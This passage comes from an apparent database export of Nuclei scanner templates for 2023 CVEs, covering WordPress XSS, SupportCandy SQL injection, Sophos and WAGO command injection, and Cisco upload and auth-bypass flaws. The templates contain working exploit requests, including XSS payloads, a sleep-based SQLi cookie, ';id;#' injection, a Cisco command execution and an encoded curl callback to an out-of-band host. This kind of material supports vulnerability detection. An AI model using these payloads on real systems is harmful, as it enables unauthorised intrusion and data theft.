"time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308609" }, "name": "CVE-2023-1546.yaml", "content": "id: CVE-2023-1546\n\ninfo:\n name: MyCryptoCheckout < 2.124 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.124\n reference:\n - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1546\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1546\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29221\n cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plainviewplugins\n product: mycryptocheckout\n framework: wordpress\n tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"scriptalert(/XSS/)/script\")'\n - 'contains(body_2, \"mycryptocheckout\")'\n condition: and\n# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950", "hash": "94ec91136bc49d78eec8019399ea9ea0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860a" }, "name": "CVE-2023-1671.yaml", "content": "id: CVE-2023-1671\n\ninfo:\n name: Sophos Web Appliance - Remote Code Execution\n author: Co5mos\n severity: critical\n description: |\n A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.\n reference:\n - https://vulncheck.com/blog/cve-2023-1671-analysis\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1671\n - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html\n - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce\n - https://github.com/lions2012/Penetration_Testing_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1671\n cwe-id: CWE-77\n epss-score: 0.96156\n epss-percentile: 0.99469\n cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sophos\n product: web_appliance\n shodan-query: title:\"Sophos Web Appliance\"\n fofa-query: title=\"Sophos Web Appliance\"\n tags: cve2023,cve,packetstorm,rce,sophos,oast,kev\n\nhttp:\n - raw:\n - |\n POST /index.php?c=blocked&action=continue HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950", "hash": "5c93a38a39b07e5abbe3245bc1b4f4bd", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860b" }, "name": "CVE-2023-1698.yaml", "content": "id: CVE-2023-1698\n\ninfo:\n name: WAGO - Remote Command Execution\n author: xianke\n severity: critical\n description: |\n In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1698\n - https://cert.vde.com/en/advisories/VDE-2023-007/\n - https://github.com/codeb0ss/CVE-2023-1698-PoC\n - https://github.com/deIndra/CVE-2023-1698\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1698\n cwe-id: CWE-78\n epss-score: 0.55051\n epss-percentile: 0.97591\n cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wago\n product: compact_controller_100_firmware\n shodan-query: html:\"/wbm/\" html:\"wago\"\n tags: cve2023,cve,wago,rce\n\nhttp:\n - raw:\n - |\n POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {\"package\":\";id;#\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"license\":'\n - '\"name\":'\n - 'uid='\n - 'gid='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950", "hash": "4ed98c01424f8c98aebc2b96b523ca73", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860c" }, "name": "CVE-2023-1719.yaml", "content": "id: CVE-2023-1719\n\ninfo:\n name: Bitrix Component - Cross-Site Scripting\n author: DhiyaneshDk\n severity: critical\n description: |\n Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.\n reference:\n - https://starlabs.sg/advisories/23/23-1719/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1719\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1719\n cwe-id: CWE-665\n epss-score: 0.02807\n epss-percentile: 0.90415\n cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bitrix24\n product: bitrix24\n shodan-query: html:\"/bitrix/\"\n tags: cve2023,cve,bitrix,xss,bitrix24\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'LOG_CNT':\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950", "hash": "d805d46a2127c08af463565bdb9bbd39", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860d" }, "name": "CVE-2023-1730.yaml", "content": "id: CVE-2023-1730\n\ninfo:\n name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 3.1.5\n reference:\n - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7\n - https://wordpress.org/plugins/supportcandy/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1730\n - https://github.com/tanjiti/sec_profile\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1730\n cwe-id: CWE-89\n epss-score: 0.05497\n epss-percentile: 0.93034\n cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: supportcandy\n product: supportcandy\n framework: wordpress\n tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"supportcandy\")'\n condition: and\n# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950", "hash": "c5b5a33e71d254d77dbd433f895883ad", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860e" }, "name": "CVE-2023-1780.yaml", "content": "id: CVE-2023-1780\n\ninfo:\n name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n remediation: Fixed in version 4.5.3\n reference:\n - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1780\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1780\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.2903\n cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: codeermeneer\n product: companion_sitemap_generator\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/companion-sitemap-generator/\"\n tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"re not allowed to view\")'\n - 'contains(body_2, \"\")'\n condition: and\n# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950", "hash": "495174baf7aa0dc0535fed11d0649e12", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860f" }, "name": "CVE-2023-1835.yaml", "content": "id: CVE-2023-1835\n\ninfo:\n name: Ninja Forms < 3.6.22 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\n - https://wordpress.org/plugins/ninja-forms/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1835\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1835\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ninjaforms\n product: ninja_forms\n framework: wordpress\n tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Ninja Forms\")'\n condition: and\n# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950", "hash": "716dd8379c3722851de86aded3e6bc14", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308610" }, "name": "CVE-2023-1880.yaml", "content": "id: CVE-2023-1880\n\ninfo:\n name: Phpmyfaq v3.1.11 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n remediation: Fixed in 3.1.12 Version.\n reference:\n - https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1880\n - https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1880\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3203\n cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpmyfaq\n product: phpmyfaq\n shodan-query: http.html:\"phpmyfaq\"\n tags: cve2023,cve,huntr,xss,phpmyfaq\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"phpmyfaq\") && contains(body, \"\")'\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950", "hash": "1eebbdcd9896c6ae0305e96e36bdcdef", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308611" }, "name": "CVE-2023-1890.yaml", "content": "id: CVE-2023-1890\n\ninfo:\n name: Tablesome < 1.0.9 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.0.9.\n reference:\n - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d\n - https://wordpress.org/plugins/tablesome/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1890\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1890\n cwe-id: CWE-79\n epss-score: 0.00203\n epss-percentile: 0.57653\n cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pauple\n product: tablesome\n framework: wordpress\n tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"tablesome\")'\n condition: and\n# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950", "hash": "9439602d6ef2f375350df3b218b6216e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308612" }, "name": "CVE-2023-20073.yaml", "content": "id: CVE-2023-20073\n\ninfo:\n name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload\n author: princechaddha,ritikchaddha\n severity: critical\n description: |\n A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches provided by Cisco to mitigate this vulnerability.\n reference:\n - https://unsafe.sh/go-173464.html\n - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f\n - https://github.com/RegularITCat/CVE-2023-20073/tree/main\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20073\n - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20073\n cwe-id: CWE-434\n epss-score: 0.38542\n epss-percentile: 0.97132\n cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cisco\n product: rv340_firmware\n fofa-query: app=\"CISCO-RV340\" || app=\"CISCO-RV340W\" || app=\"CISCO-RV345\" || app=\"CISCO-RV345P\"\n tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive\nvariables:\n html_comment: \"\" # Random string as HTML comment to append in response body\n\nhttp:\n - raw:\n - |\n GET /index.html HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\n Host: {{Hostname}}\n Authorization: 1\n Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"pathparam\"\n\n Portal\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"fileparam\"\n\n index.html\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"file.path\"\n\n index.html\n --------------------------f6f99e26f3a45adf\n Content-Disposition: form-data; name=\"file\"; filename=\"index.html\"\n Content-Type: application/octet-stream\n\n {{index}}\n {{html_comment}}\n\n --------------------------f6f99e26f3a45adf--\n - |\n GET /index.html HTTP/1.1\n Host: {{Hostname}}\n\n extractors:\n - type: dsl\n name: index\n internal: true\n dsl:\n - body_1\n matchers:\n - type: word\n part: body_3\n words:\n - \"{{html_comment}}\"\n# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950", "hash": "4386559404be5f63398bf634d2fce73c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308613" }, "name": "CVE-2023-2009.yaml", "content": "id: CVE-2023-2009\n\ninfo:\n name: Pretty Url <= 1.5.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n reference:\n - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2009\n - https://wordpress.org/plugins/pretty-url/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2009\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3232\n cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: pretty_url_project\n product: pretty_url\n framework: wordpress\n tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log=((username))&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"prettyurls\")'\n condition: and\n\n extractors:\n - type: regex\n internal: true\n name: nonce\n part: body\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-z]+)\" />'\n# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950", "hash": "b52d25c6d698c3b89a25b209eb65504d", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308614" }, "name": "CVE-2023-20198.yaml", "content": "id: CVE-2023-20198\n\ninfo:\n name: Cisco IOS XE - Authentication Bypass\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: |\n Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\n For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\n Cisco will provide updates on the status of this investigation and when a software patch is available.\n impact: |\n The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.\n reference:\n - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/\n - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/\n - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\n - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities\n - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2023-20198\n epss-score: 0.92151\n epss-percentile: 0.98755\n cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: ios_xe\n shodan-query: http.html_hash:1076109428\n note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.\n tags: cve2023,cve,kev,cisco,rce,auth-bypass\nvariables:\n cmd: uname -a\n\nhttp:\n - raw:\n - |-\n POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\n Host: {{Hostname}}\n\n admin***** {{cmd}}\n\n matchers:\n - type: regex\n part: body\n regex:\n - XMLSchema\n - execLog\n - Cisco Systems\n - \n - \n condition: and\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - \\n(.*)\\[\n# digest: 490a0046304402204b6c30a90e6cf37aa7916fdb2aa34c90e17498b711af7c429834fbea028f05810220647873d5d55dd1e9af9ad701d9f44d1cd41765c1ab655050cf34f6bf140499e6:922c64590222798bb761d5b6d8e72950", "hash": "b37fa3e9180fe101312f5b7bdccf7ae2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308615" }, "name": "CVE-2023-2023.yaml", "content": "id: CVE-2023-2023\n\ninfo:\n name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.7.3\n reference:\n - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317\n - https://wordpress.org/plugins/custom-404-pro/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2023\n - https://github.com/GREENHAT7/pxplan\n - https://github.com/thatformat/Hvv2023\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-2023\n cwe-id: CWE-79\n epss-score: 0.00374\n epss-percentile: 0.722\n cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: kunalnagar\n product: custom_404_pro\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(content_type_2, \"text/html\")\n - contains(body_2, \"onanimationstart=alert(document.domain)//\")\n - contains(body_2, \"Custom 404 Pro\")\n condition: and\n# digest: 